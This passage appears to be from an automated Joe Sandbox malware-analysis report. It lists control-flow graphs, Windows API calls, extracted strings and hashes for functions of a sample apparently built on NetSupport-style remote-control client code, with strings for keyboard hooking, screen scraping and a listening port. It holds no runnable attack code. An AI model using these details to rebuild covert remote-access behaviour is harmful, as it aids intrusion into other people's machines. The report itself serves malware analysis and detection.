                                                                                      control_flow_graph 1923 11133920-1113395c 1924 11133962-11133984 call 1105dd10 1923->1924 1925 11133c84-11133c9f call 11161d01 1923->1925 1924->1925 1930 1113398a-1113399e GetLocalTime 1924->1930 1931 111339c1-11133a43 LoadLibraryA call 110098c0 call 11015c30 GetCurrentProcess 1930->1931 1932 111339a0-111339bc call 11146450 1930->1932 1939 11133a45-11133a5b GetProcAddress 1931->1939 1940 11133a5d-11133a64 GetProcessHandleCount 1931->1940 1932->1931 1939->1940 1941 11133a66-11133a68 SetLastError 1939->1941 1942 11133a6e-11133a76 1940->1942 1941->1942 1943 11133a92-11133a9e 1942->1943 1944 11133a78-11133a90 GetProcAddress 1942->1944 1947 11133aa0-11133ab8 GetProcAddress 1943->1947 1948 11133aba-11133ac5 1943->1948 1944->1943 1945 11133ac7-11133ad2 SetLastError 1944->1945 1945->1947 1947->1948 1949 11133ad4-11133adc SetLastError 1947->1949 1950 11133adf-11133aef GetProcAddress 1948->1950 1949->1950 1952 11133af1-11133afd K32GetProcessMemoryInfo 1950->1952 1953 11133aff-11133b01 SetLastError 1950->1953 1954 11133b07-11133b15 1952->1954 1953->1954 1955 11133b23-11133b2e 1954->1955 1956 11133b17-11133b1f 1954->1956 1957 11133b30-11133b38 1955->1957 1958 11133b3c-11133b47 1955->1958 1956->1955 1957->1958 1959 11133b55-11133b5f 1958->1959 1960 11133b49-11133b51 1958->1960 1961 11133b61-11133b68 1959->1961 1962 11133b6a-11133b6d 1959->1962 1960->1959 1963 11133b6f-11133b7d call 11146450 1961->1963 1962->1963 1964 11133b80-11133b92 1962->1964 1963->1964 1968 11133c5a-11133c68 1964->1968 1969 11133b98-11133baa call 110637c0 1964->1969 1970 11133c6a-11133c6b FreeLibrary 1968->1970 1971 11133c6d-11133c75 1968->1971 1969->1968 1977 11133bb0-11133bd1 call 1105dd10 1969->1977 1970->1971 1973 11133c77-11133c78 FreeLibrary 1971->1973 1974 11133c7a-11133c7f 1971->1974 1973->1974 1974->1925 1976 11133c81-11133c82 FreeLibrary 1974->1976 1976->1925 1980 11133bd3-11133bd9 1977->1980 1981 11133bdf-11133bfb call 1105dd10 1977->1981 1980->1981 1982 11133bdb 1980->1982 1985 11133c06-11133c22 call 1105dd10 1981->1985 1986 11133bfd-11133c00 1981->1986 1982->1981 1990 11133c24-11133c27 1985->1990 1991 11133c2d-11133c49 call 1105dd10 1985->1991 1986->1985 1987 11133c02 1986->1987 1987->1985 1990->1991 1992 11133c29 1990->1992 1995 11133c50-11133c53 1991->1995 1996 11133c4b-11133c4e 1991->1996 1992->1991 1995->1968 1997 11133c55 call 11027780 1995->1997 1996->1995 1996->1997 1997->1968
                                                                                      APIs
                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                      • GetLocalTime.KERNEL32(?,_debug,CheckLeaks,00000001,00000000,4012B9B4), ref: 1113398E
                                                                                      • LoadLibraryA.KERNEL32(psapi.dll), ref: 111339E6
                                                                                      • GetCurrentProcess.KERNEL32 ref: 11133A27
                                                                                      • GetProcAddress.KERNEL32(?,GetProcessHandleCount), ref: 11133A51
                                                                                      • GetProcessHandleCount.KERNEL32(00000000,?), ref: 11133A62
                                                                                      • SetLastError.KERNEL32(00000078), ref: 11133A68
                                                                                      • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11133A84
                                                                                      • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11133AAC
                                                                                      • SetLastError.KERNEL32(00000078), ref: 11133AC9
                                                                                      • SetLastError.KERNEL32(00000078), ref: 11133AD6
                                                                                      • GetProcAddress.KERNEL32(?,GetProcessMemoryInfo), ref: 11133AE8
                                                                                      • K32GetProcessMemoryInfo.KERNEL32(?,?,00000028), ref: 11133AFB
                                                                                      • SetLastError.KERNEL32(00000078), ref: 11133B01
                                                                                      • FreeLibrary.KERNEL32(?), ref: 11133C6B
                                                                                      • FreeLibrary.KERNEL32(?), ref: 11133C78
                                                                                      • FreeLibrary.KERNEL32(?), ref: 11133C82
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressErrorLastLibraryProc$FreeProcess$CountCurrentHandleInfoLoadLocalMemoryTime__wcstoi64
                                                                                      • String ID: CheckLeaks$Client$Date=%04d-%02d-%02d$GetGuiResources$GetProcessHandleCount$GetProcessMemoryInfo$RestartGdiObj$RestartHandles$RestartMB$RestartUserObj$Used handles=%d, gdiObj=%d, userObj=%d, mem=%u kB$_debug$psapi.dll$
                                                                                      • API String ID: 263027137-103253431
                                                                                      • Opcode ID: 87783a789c6862cb7a583f6d0127a67f1abf74d6ca2b18a0a01f6916aa137176
                                                                                      • Instruction ID: 17d7fdf42b282dadbb05295794651177f64ab9c07d211a437ec733fd2e53fcc2
                                                                                      • Opcode Fuzzy Hash: 87783a789c6862cb7a583f6d0127a67f1abf74d6ca2b18a0a01f6916aa137176
                                                                                      • Instruction Fuzzy Hash: A3B1BFB1E242699FDB10DFE9CDC0AADFBB6EB48319F10452AE414E7348DB349844CB65
                                                                                      Function 1102DBC9 Relevance: 49.3, APIs: 7, Strings: 21, Instructions: 319libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1999 1102dbc9 2000 1102dbd0-1102dbe1 1999->2000 2000->2000 2001 1102dbe3 2000->2001 2002 1102dd24-1102dd3d call 11142ac0 2001->2002 2005 1102dd43-1102dd45 2002->2005 2006 1102dbc0-1102dbc3 2002->2006 2009 1102de43-1102de5d call 111463d0 2005->2009 2010 1102dd4b-1102dd51 2005->2010 2007 1102dbc5-1102dbc7 2006->2007 2008 1102dbe8-1102dbf1 2006->2008 2007->2000 2008->2002 2011 1102dbf7-1102dbfe 2008->2011 2032 1102deb3-1102debf call 1102b4f0 2009->2032 2033 1102de5f-1102de78 call 1105dd10 2009->2033 2013 1102dd53-1102dd62 call 11144dc0 2010->2013 2014 1102dd68-1102dd78 2010->2014 2011->2002 2017 1102dcf3-1102dd08 call 11162de7 2011->2017 2018 1102dc05-1102dc07 2011->2018 2019 1102dd0a-1102dd1f call 11162de7 2011->2019 2020 1102dc9a-1102dccd call 111618c1 call 11142290 2011->2020 2021 1102dcdb-1102dcf1 call 11164010 2011->2021 2022 1102dc8b-1102dc95 2011->2022 2023 1102dccf-1102dcd9 2011->2023 2024 1102dc4c-1102dc52 2011->2024 2025 1102dc7c-1102dc86 2011->2025 2013->2014 2015 1102dd7a 2014->2015 2016 1102dd7f-1102dd9d call 1102cc10 2014->2016 2015->2016 2016->2009 2051 1102dda3-1102ddc8 call 110b7920 call 11146450 2016->2051 2017->2002 2018->2002 2031 1102dc0d-1102dc47 call 111618c1 call 11142290 call 1102cc10 2018->2031 2019->2002 2020->2002 2021->2002 2022->2002 2023->2002 2035 1102dc54-1102dc68 call 11162de7 2024->2035 2036 1102dc6d-1102dc77 2024->2036 2025->2002 2031->2002 2055 1102dec1-1102dec8 2032->2055 2056 1102de98-1102de9f 2032->2056 2033->2032 2059 1102de7a-1102de8c 2033->2059 2035->2002 2036->2002 2084 1102ddd3-1102ddd9 2051->2084 2085 1102ddca-1102ddd1 2051->2085 2061 1102dea5-1102dea8 2055->2061 2064 1102deca-1102ded4 2055->2064 2056->2061 2062 1102e0aa-1102e0cb GetComputerNameA 2056->2062 2059->2032 2076 1102de8e 2059->2076 2068 1102deaa-1102deb1 call 110b7920 2061->2068 2069 1102ded9 2061->2069 2066 1102e103-1102e109 2062->2066 2067 1102e0cd-1102e101 call 11027c30 2062->2067 2064->2062 2073 1102e10b-1102e110 2066->2073 2074 1102e13f-1102e152 call 11164010 2066->2074 2067->2066 2102 1102e157-1102e163 2067->2102 2079 1102dedc-1102dfb6 call 110278e0 call 11027be0 call 110278e0 * 2 LoadLibraryA GetProcAddress 2068->2079 2069->2079 2083 1102e116-1102e11a 2073->2083 2095 1102e347-1102e36a 2074->2095 2076->2056 2133 1102e07a-1102e082 SetLastError 2079->2133 2134 1102dfbc-1102dfd3 2079->2134 2089 1102e136-1102e138 2083->2089 2090 1102e11c-1102e11e 2083->2090 2092 1102dddb-1102dde2 call 11027d60 2084->2092 2093 1102de39 2084->2093 2085->2009 2100 1102e13b-1102e13d 2089->2100 2097 1102e132-1102e134 2090->2097 2098 1102e120-1102e126 2090->2098 2092->2093 2109 1102dde4-1102de16 2092->2109 2093->2009 2111 1102e392-1102e39a 2095->2111 2112 1102e36c-1102e372 2095->2112 2097->2100 2098->2089 2103 1102e128-1102e130 2098->2103 2100->2074 2100->2102 2106 1102e165-1102e17a call 110b7920 call 11029bd0 2102->2106 2107 1102e17c-1102e18f call 11081a70 2102->2107 2103->2083 2103->2097 2139 1102e1d3-1102e1ec call 11081a70 2106->2139 2128 1102e191-1102e1b4 2107->2128 2129 1102e1b6-1102e1b8 2107->2129 2122 1102de20-1102de2f call 110f6080 2109->2122 2123 1102de18-1102de1e 2109->2123 2116 1102e3ac-1102e438 call 111618c1 * 2 call 11146450 * 2 GetCurrentProcessId call 110eddd0 call 11027c90 call 11146450 call 11161d01 2111->2116 2117 1102e39c-1102e3a9 call 11035dd0 call 111618c1 2111->2117 2112->2111 2121 1102e374-1102e38d call 1102d330 2112->2121 2117->2116 2121->2111 2130 1102de32-1102de34 call 1102d330 2122->2130 2123->2122 2123->2130 2128->2139 2138 1102e1c0-1102e1d1 2129->2138 2130->2093 2145 1102e043-1102e04f 2133->2145 2134->2145 2154 1102dfd5-1102dfde 2134->2154 2138->2138 2138->2139 2159 1102e1f2-1102e26d call 11146450 call 110cfc30 call 110d1480 call 110b7920 wsprintfA call 110b7920 wsprintfA 2139->2159 2160 1102e32c-1102e339 call 11164010 2139->2160 2148 1102e092-1102e0a1 2145->2148 2149 1102e051-1102e05d 2145->2149 2148->2062 2158 1102e0a3-1102e0a4 FreeLibrary 2148->2158 2155 1102e06f-1102e073 2149->2155 2156 1102e05f-1102e06d GetProcAddress 2149->2156 2154->2145 2163 1102dfe0-1102e016 call 11146450 call 1112b270 2154->2163 2161 1102e084-1102e086 SetLastError 2155->2161 2162 1102e075-1102e078 2155->2162 2156->2155 2158->2062 2199 1102e283-1102e299 call 11128ec0 2159->2199 2200 1102e26f-1102e27e call 11029450 2159->2200 2177 1102e33c-1102e341 CharUpperA 2160->2177 2168 1102e08c 2161->2168 2162->2168 2163->2145 2184 1102e018-1102e03e call 11146450 call 11027920 2163->2184 2168->2148 2177->2095 2184->2145 2204 1102e2b2-1102e2ec call 110d0bd0 * 2 2199->2204 2205 1102e29b-1102e2ad call 110d0bd0 2199->2205 2200->2199 2212 1102e302-1102e32a call 11164010 call 110d07c0 2204->2212 2213 1102e2ee-1102e2fd call 11029450 2204->2213 2205->2204 2212->2177 2213->2212
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(Wtsapi32.dll,Client,screenscrape,00000001,00000003,TCPIP,ListenPort,00000000,00000003,00000003,?,?,?,?,?,?), ref: 1102DF31
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID: $14/03/16 10:38:31 V12.10F8$405464$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$ListenPort$MacAddress$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                      • API String ID: 1029625771-4270881505
                                                                                      • Opcode ID: efde7a6f29c4b35a1bc2373ff856d498f8aef1b4f42035034b7e6d706e59a609
                                                                                      • Instruction ID: 8eab5b2d156e186679f92ce27f1e5cdd209b728942572a9b5b46018c3091c824
                                                                                      • Opcode Fuzzy Hash: efde7a6f29c4b35a1bc2373ff856d498f8aef1b4f42035034b7e6d706e59a609
                                                                                      • Instruction Fuzzy Hash: 97C1D275E0026AAFDF22DF959C84BEDF7B9AB44308F9440EDE55867280D770AE80CB51
                                                                                      Function 111414A0 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 266libraryregistryloaderCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2219 111414a0-111414e1 call 11146450 2222 111414e7-11141543 LoadLibraryA 2219->2222 2223 11141569-11141593 call 11142e80 call 11146ee0 LoadLibraryA 2219->2223 2224 11141545-11141550 call 11017450 2222->2224 2225 11141557-11141560 2222->2225 2235 11141595-1114159b 2223->2235 2236 111415c3 2223->2236 2224->2225 2232 11141552 call 110cc7f0 2224->2232 2225->2223 2228 11141562-11141563 FreeLibrary 2225->2228 2228->2223 2232->2225 2235->2236 2238 1114159d-111415a3 2235->2238 2237 111415cd-111415ed GetClassInfoExA 2236->2237 2240 111415f3-1114161a call 11161d20 call 111444b0 2237->2240 2241 1114168e-111416e6 2237->2241 2238->2236 2239 111415a5-111415c1 call 1105dd10 2238->2239 2239->2237 2250 11141633-11141675 call 111444b0 call 111444e0 LoadCursorA GetStockObject RegisterClassExA 2240->2250 2251 1114161c-11141630 call 11029450 2240->2251 2252 11141722-11141728 2241->2252 2253 111416e8-111416ee 2241->2253 2250->2241 2274 11141677-1114168b call 11029450 2250->2274 2251->2250 2254 11141764-11141786 call 1105dd10 2252->2254 2255 1114172a-11141739 call 1110f420 2252->2255 2253->2252 2257 111416f0-111416f6 2253->2257 2271 11141794-11141799 2254->2271 2272 11141788-11141792 2254->2272 2269 1114175d 2255->2269 2270 1114173b-1114175b 2255->2270 2257->2252 2262 111416f8-1114170f call 1112c830 LoadLibraryA 2257->2262 2262->2252 2278 11141711-1114171d GetProcAddress 2262->2278 2275 1114175f 2269->2275 2270->2275 2276 111417a5-111417ab 2271->2276 2277 1114179b 2271->2277 2272->2276 2274->2241 2275->2254 2280 111417ad-111417b3 call 110f7d00 2276->2280 2281 111417b8-111417d1 call 1113cd80 2276->2281 2277->2276 2278->2252 2280->2281 2287 111417d7-111417dd 2281->2287 2288 11141879-1114188a 2281->2288 2289 111417df-111417f1 call 1110f420 2287->2289 2290 11141819-1114181f 2287->2290 2301 111417f3-11141809 call 1115d6d0 2289->2301 2302 1114180b 2289->2302 2292 11141845-11141851 2290->2292 2293 11141821-11141827 2290->2293 2296 11141853-11141859 2292->2296 2297 11141868-11141873 #17 LoadLibraryA 2292->2297 2294 1114182e-11141840 SetTimer 2293->2294 2295 11141829 call 11134930 2293->2295 2294->2292 2295->2294 2296->2297 2300 1114185b-11141861 2296->2300 2297->2288 2300->2297 2303 11141863 call 1112d6a0 2300->2303 2305 1114180d-11141814 2301->2305 2302->2305 2303->2297 2305->2290
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(User32.dll,00000000,00000000), ref: 111414F3
                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 11141563
                                                                                      • LoadLibraryA.KERNEL32(imm32,?,?,00000000,00000000), ref: 11141586
                                                                                      • GetClassInfoExA.USER32(11000000,NSMWClass,?), ref: 111415E5
                                                                                      • _memset.LIBCMT ref: 111415F9
                                                                                      • LoadCursorA.USER32(00000000,00007F00), ref: 11141649
                                                                                      • GetStockObject.GDI32(00000000), ref: 11141653
                                                                                      • RegisterClassExA.USER32(?), ref: 1114166A
                                                                                      • LoadLibraryA.KERNEL32(pcihooks,?,?,00000000,00000000), ref: 11141702
                                                                                      • GetProcAddress.KERNEL32(00000000,HookKeyboard), ref: 11141717
                                                                                      • SetTimer.USER32(00000000,00000000,000003E8,1113CD60), ref: 1114183A
                                                                                      • #17.COMCTL32(?,?,?,00000000,00000000), ref: 11141868
                                                                                      • LoadLibraryA.KERNEL32(riched32.dll,?,?,?,00000000,00000000), ref: 11141873
                                                                                        • Part of subcall function 11017450: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,4012B9B4,1102FCB2,00000000), ref: 1101747E
                                                                                        • Part of subcall function 11017450: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1101748E
                                                                                        • Part of subcall function 11017450: GetProcAddress.KERNEL32(00000000,QueueUserWorkItem), ref: 110174D2
                                                                                        • Part of subcall function 11017450: FreeLibrary.KERNEL32(00000000), ref: 110174F8
                                                                                        • Part of subcall function 110CC7F0: CreateWindowExA.USER32(00000000,button,11194244,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000000,00000000), ref: 110CC829
                                                                                        • Part of subcall function 110CC7F0: SetClassLongA.USER32(00000000,000000E8,110CC570), ref: 110CC840
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Library$Load$Class$AddressCreateFreeProc$CursorEventInfoLongObjectRegisterStockTimerWindow_memset
                                                                                      • String ID: *quiet$HookKeyboard$InitUI (%d)$NSMGetAppIcon()$NSMWClass$TraceCopyData$UI.CPP$User32.dll$View$_License$_debug$imm32$pcihooks$riched32.dll
                                                                                      • API String ID: 3706574701-3145203681
                                                                                      • Opcode ID: bf77d67e3ec3500b8f2db5927d4705f1cc154319e5a682cee20025d48f6291c1
                                                                                      • Instruction ID: 9b294397b9efa9119a6c3372e39ca87a41eafe2d9b680e3b49ce131b24699399
                                                                                      • Opcode Fuzzy Hash: bf77d67e3ec3500b8f2db5927d4705f1cc154319e5a682cee20025d48f6291c1
                                                                                      • Instruction Fuzzy Hash: 6EA19DB4E0126AAFDB01DFE9C9C4AADFBB4FB4870DB60413EE52997644EB306440CB55
                                                                                      Function 110285F0 Relevance: 42.5, APIs: 2, Strings: 22, Instructions: 542COMMONLIBRARYCODE
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2308 110285f0-1102860d 2309 11028613-11028642 2308->2309 2310 11028cd8-11028cdf 2308->2310 2311 110286d0-11028718 GetModuleFileNameA call 111631f0 call 11163fed 2309->2311 2312 11028648-1102864e 2309->2312 2313 11028cf1-11028cf5 2310->2313 2314 11028ce1-11028cea 2310->2314 2328 1102871d 2311->2328 2316 11028650-11028658 2312->2316 2318 11028cf7-11028d09 call 11161d01 2313->2318 2319 11028d0a-11028d1e call 11161d01 2313->2319 2314->2313 2317 11028cec 2314->2317 2316->2316 2321 1102865a-11028660 2316->2321 2317->2313 2325 11028663-11028668 2321->2325 2325->2325 2329 1102866a-11028674 2325->2329 2330 11028720-1102872a 2328->2330 2331 11028691-11028697 2329->2331 2332 11028676-1102867d 2329->2332 2333 11028730-11028733 2330->2333 2334 11028ccf-11028cd7 2330->2334 2336 11028698-1102869e 2331->2336 2335 11028680-11028686 2332->2335 2333->2334 2337 11028739-11028747 call 11026890 2333->2337 2334->2310 2335->2335 2338 11028688-1102868e 2335->2338 2336->2336 2339 110286a0-110286ce call 11163fed 2336->2339 2344 11028c55-11028c6a call 11163db7 2337->2344 2345 1102874d-11028760 call 11162de7 2337->2345 2338->2331 2339->2330 2344->2334 2350 11028c70-11028cca 2344->2350 2351 11028762-11028765 2345->2351 2352 1102876b-11028793 call 11026700 call 11026890 2345->2352 2350->2334 2351->2344 2351->2352 2352->2344 2357 11028799-110287b6 call 11026980 call 11026890 2352->2357 2362 11028bc5-11028bcc 2357->2362 2363 110287bc 2357->2363 2364 11028bf2-11028bf9 2362->2364 2365 11028bce-11028bd1 2362->2365 2366 110287c0-110287e0 call 11026700 2363->2366 2368 11028c11-11028c18 2364->2368 2369 11028bfb-11028c01 2364->2369 2365->2364 2367 11028bd3-11028bda 2365->2367 2376 110287e2-110287e5 2366->2376 2377 11028816-11028819 2366->2377 2371 11028be0-11028bf0 2367->2371 2373 11028c1a-11028c25 2368->2373 2374 11028c28-11028c2f 2368->2374 2372 11028c07-11028c0f 2369->2372 2371->2364 2371->2371 2372->2368 2372->2372 2373->2374 2378 11028c31-11028c3b 2374->2378 2379 11028c3e-11028c45 2374->2379 2382 110287e7-110287ee 2376->2382 2383 110287fe-11028801 2376->2383 2380 11028bae-11028bbf call 11026890 2377->2380 2381 1102881f-11028832 call 11164150 2377->2381 2378->2379 2379->2344 2384 11028c47-11028c52 2379->2384 2380->2362 2380->2366 2381->2380 2391 11028838-11028854 call 111646ce 2381->2391 2388 110287f4-110287fc 2382->2388 2383->2380 2385 11028807-11028811 2383->2385 2384->2344 2385->2380 2388->2383 2388->2388 2394 11028856-1102885c 2391->2394 2395 1102886f-11028885 call 111646ce 2391->2395 2396 11028860-11028868 2394->2396 2400 11028887-1102888d 2395->2400 2401 1102889f-110288b5 call 111646ce 2395->2401 2396->2396 2398 1102886a 2396->2398 2398->2380 2403 11028890-11028898 2400->2403 2406 110288b7-110288bd 2401->2406 2407 110288cf-110288e5 call 111646ce 2401->2407 2403->2403 2404 1102889a 2403->2404 2404->2380 2408 110288c0-110288c8 2406->2408 2412 110288e7-110288ed 2407->2412 2413 110288ff-11028915 call 111646ce 2407->2413 2408->2408 2410 110288ca 2408->2410 2410->2380 2414 110288f0-110288f8 2412->2414 2418 11028917-1102891d 2413->2418 2419 1102892f-11028945 call 111646ce 2413->2419 2414->2414 2416 110288fa 2414->2416 2416->2380 2420 11028920-11028928 2418->2420 2424 11028947-1102894d 2419->2424 2425 1102895f-11028975 call 111646ce 2419->2425 2420->2420 2422 1102892a 2420->2422 2422->2380 2426 11028950-11028958 2424->2426 2430 11028977-1102897d 2425->2430 2431 1102898f-110289a5 call 111646ce 2425->2431 2426->2426 2428 1102895a 2426->2428 2428->2380 2433 11028980-11028988 2430->2433 2436 110289a7-110289ad 2431->2436 2437 110289bf-110289d5 call 111646ce 2431->2437 2433->2433 2435 1102898a 2433->2435 2435->2380 2438 110289b0-110289b8 2436->2438 2442 110289d7-110289dd 2437->2442 2443 110289ef-11028a05 call 111646ce 2437->2443 2438->2438 2440 110289ba 2438->2440 2440->2380 2444 110289e0-110289e8 2442->2444 2448 11028a07-11028a0d 2443->2448 2449 11028a1f-11028a35 call 111646ce 2443->2449 2444->2444 2446 110289ea 2444->2446 2446->2380 2451 11028a10-11028a18 2448->2451 2454 11028a37-11028a3d 2449->2454 2455 11028a4f-11028a65 call 111646ce 2449->2455 2451->2451 2452 11028a1a 2451->2452 2452->2380 2456 11028a40-11028a48 2454->2456 2460 11028a86-11028a9c call 111646ce 2455->2460 2461 11028a67-11028a6d 2455->2461 2456->2456 2458 11028a4a 2456->2458 2458->2380 2466 11028ab3-11028ac9 call 111646ce 2460->2466 2467 11028a9e 2460->2467 2462 11028a77-11028a7f 2461->2462 2462->2462 2464 11028a81 2462->2464 2464->2380 2472 11028ae0-11028af6 call 111646ce 2466->2472 2473 11028acb 2466->2473 2468 11028aa4-11028aac 2467->2468 2468->2468 2470 11028aae 2468->2470 2470->2380 2478 11028b17-11028b2d call 111646ce 2472->2478 2479 11028af8-11028afe 2472->2479 2474 11028ad1-11028ad9 2473->2474 2474->2474 2476 11028adb 2474->2476 2476->2380 2484 11028b4f-11028b65 call 111646ce 2478->2484 2485 11028b2f-11028b3f 2478->2485 2481 11028b08-11028b10 2479->2481 2481->2481 2483 11028b12 2481->2483 2483->2380 2490 11028b67-11028b6d 2484->2490 2491 11028b7c-11028b92 call 111646ce 2484->2491 2486 11028b40-11028b48 2485->2486 2486->2486 2488 11028b4a 2486->2488 2488->2380 2492 11028b70-11028b78 2490->2492 2491->2380 2496 11028b94-11028b9a 2491->2496 2492->2492 2494 11028b7a 2492->2494 2494->2380 2497 11028ba4-11028bac 2496->2497 2497->2380 2497->2497
                                                                                      APIs
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,6D121370,?,0000001A), ref: 110286DD
                                                                                      • _strrchr.LIBCMT ref: 110286EC
                                                                                        • Part of subcall function 111646CE: __stricmp_l.LIBCMT ref: 1116470B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
